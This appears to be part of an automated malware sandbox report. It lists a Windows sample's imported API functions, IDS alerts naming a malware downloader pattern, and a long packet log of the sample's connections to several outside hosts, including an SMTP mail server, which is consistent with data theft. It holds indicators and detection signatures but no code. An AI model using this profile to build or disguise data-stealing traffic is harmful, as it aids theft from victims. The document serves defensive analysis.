                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain
                                                                    EnglishUnited States
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-09-25T15:34:13.196430+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.130.080TCP
                                                                    2024-09-25T15:34:14.071432+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.130.080TCP
                                                                    2024-09-25T15:34:14.669336+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706188.114.97.3443TCP
                                                                    2024-09-25T15:34:15.196577+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.130.080TCP
                                                                    2024-09-25T15:34:20.252908+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549716188.114.97.3443TCP
                                                                    2024-09-25T15:34:31.649538+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549728193.122.130.080TCP
                                                                    2024-09-25T15:34:32.446433+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549728193.122.130.080TCP
                                                                    2024-09-25T15:34:33.024873+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549730188.114.97.3443TCP
                                                                    2024-09-25T15:34:33.540191+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549731193.122.130.080TCP
                                                                    2024-09-25T15:34:36.632789+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549736188.114.97.3443TCP
                                                                    2024-09-25T15:34:40.422975+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549742188.114.97.3443TCP
                                                                    2024-09-25T15:34:41.510510+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549744188.114.97.3443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 25, 2024 15:34:12.581237078 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:12.586313009 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:12.586431026 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:12.586656094 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:12.591537952 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:13.043016911 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:13.047588110 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:13.052464962 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:13.148109913 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:13.196429968 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:13.248842955 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.248905897 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.248965025 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.257680893 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.257707119 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.725975037 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.726097107 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.731532097 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.731559038 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.731873989 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.774548054 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.786104918 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.827410936 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.905750036 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.905848026 CEST44349705188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:13.905916929 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.911629915 CEST49705443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:13.919938087 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:13.925615072 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:14.020360947 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:14.024252892 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.024302959 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.024363041 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.024894953 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.024905920 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.071432114 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.484841108 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.510226965 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.510253906 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.669363022 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.669465065 CEST44349706188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:14.669543982 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.671973944 CEST49706443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:14.676212072 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.677148104 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.685264111 CEST8049704193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:14.685359001 CEST4970480192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.685425997 CEST8049707193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:14.685503960 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.685621977 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:14.692595005 CEST8049707193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:15.151278973 CEST8049707193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:15.152816057 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.152863979 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.152926922 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.153175116 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.153192043 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.196577072 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:15.619410992 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.621073008 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.621103048 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.770495892 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.770595074 CEST44349708188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:15.770657063 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.771104097 CEST49708443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:15.775443077 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:15.780755043 CEST8049709193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:15.780910015 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:15.780987024 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:15.785984993 CEST8049709193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:16.246324062 CEST8049709193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:16.247935057 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.247989893 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.248065948 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.248370886 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.248388052 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.290218115 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.707850933 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.712722063 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.712747097 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.877177000 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.877271891 CEST44349710188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:16.877389908 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.877893925 CEST49710443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:16.881756067 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.882369995 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.887324095 CEST8049711193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:16.887428999 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.887588978 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.887751102 CEST8049709193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:16.887799025 CEST4970980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:16.892692089 CEST8049711193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:17.343688965 CEST8049711193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:17.344837904 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:17.344885111 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:17.344942093 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:17.345215082 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:17.345231056 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:17.384030104 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:17.888473034 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:17.890209913 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:17.890243053 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.042293072 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.042404890 CEST44349712188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.042465925 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.043100119 CEST49712443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.046253920 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.047427893 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.051300049 CEST8049711193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:18.051373959 CEST4971180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.052185059 CEST8049713193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:18.052261114 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.052330017 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.057065010 CEST8049713193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:18.525022984 CEST8049713193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:18.526212931 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.526267052 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.526343107 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.526624918 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.526635885 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.571433067 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:18.986736059 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:18.988616943 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:18.988655090 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124022007 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124141932 CEST44349714188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.124257088 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.124639034 CEST49714443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.129589081 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.130141973 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.134855032 CEST8049713193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.134955883 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.134962082 CEST4971380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.135020971 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.135159969 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:19.139908075 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.612426043 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:19.631499052 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.631545067 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.631625891 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.635328054 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:19.635344028 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:19.665178061 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.109774113 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.111756086 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.111773968 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.252928972 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.253016949 CEST44349716188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.253071070 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.253688097 CEST49716443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.257005930 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.258047104 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.262160063 CEST8049715193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.262240887 CEST4971580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.262886047 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.262965918 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.263055086 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:20.267787933 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.725817919 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:20.727561951 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727616072 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.727807045 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727986097 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:20.727993965 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:20.774678946 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.188690901 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.190346003 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.190373898 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339232922 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339349031 CEST44349718188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.339409113 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.339858055 CEST49718443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.342550039 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.343561888 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348079920 CEST8049717193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.348149061 CEST4971780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348442078 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.348500967 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.348597050 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:21.353384972 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.814506054 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:21.815855980 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.815911055 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.816018105 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.816271067 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:21.816282988 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:21.868419886 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.293684006 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.325692892 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.325731039 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.436657906 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.436748981 CEST44349720188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:22.438249111 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.443674088 CEST49720443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:22.668061018 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.798058033 CEST8049719193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:22.798170090 CEST4971980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:22.800473928 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.800522089 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:22.802602053 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.802602053 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:22.802635908 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.449409008 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.449668884 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.451430082 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.451452017 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.451706886 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.453175068 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.499394894 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693469048 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693636894 CEST44349722149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:23.693742990 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:23.753400087 CEST49722443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:29.243438959 CEST4970780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:29.553328037 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:29.558243036 CEST58749727208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:34:29.558336020 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:31.013031960 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.018217087 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.018311977 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.018636942 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.023416042 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.474561930 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.478653908 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:31.483485937 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.596568108 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:31.638556957 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.638608932 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:31.638705015 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.643544912 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:31.643562078 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:31.649538040 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.108644962 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.108732939 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.110960960 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.110974073 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.111248970 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.165219069 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.173873901 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.215409040 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.290801048 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.290908098 CEST44349729188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.291034937 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.294621944 CEST49729443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.305228949 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.310250044 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:32.405152082 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:32.407718897 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.407785892 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.407855034 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.408134937 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.408149958 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.446433067 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:32.865061998 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:32.867124081 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:32.867158890 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.024976015 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.025333881 CEST44349730188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.025394917 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.025850058 CEST49730443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.029983997 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.031043053 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.035145998 CEST8049728193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.035295010 CEST4972880192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.035927057 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.036071062 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.036124945 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:33.041173935 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.498054981 CEST8049731193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:33.499646902 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.499706984 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.499880075 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.500179052 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:33.500193119 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:33.540190935 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.135346889 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.137427092 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.137464046 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461196899 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461596966 CEST44349732188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.461764097 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.462080002 CEST49732443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.467442036 CEST4973380192.168.2.5193.122.130.0
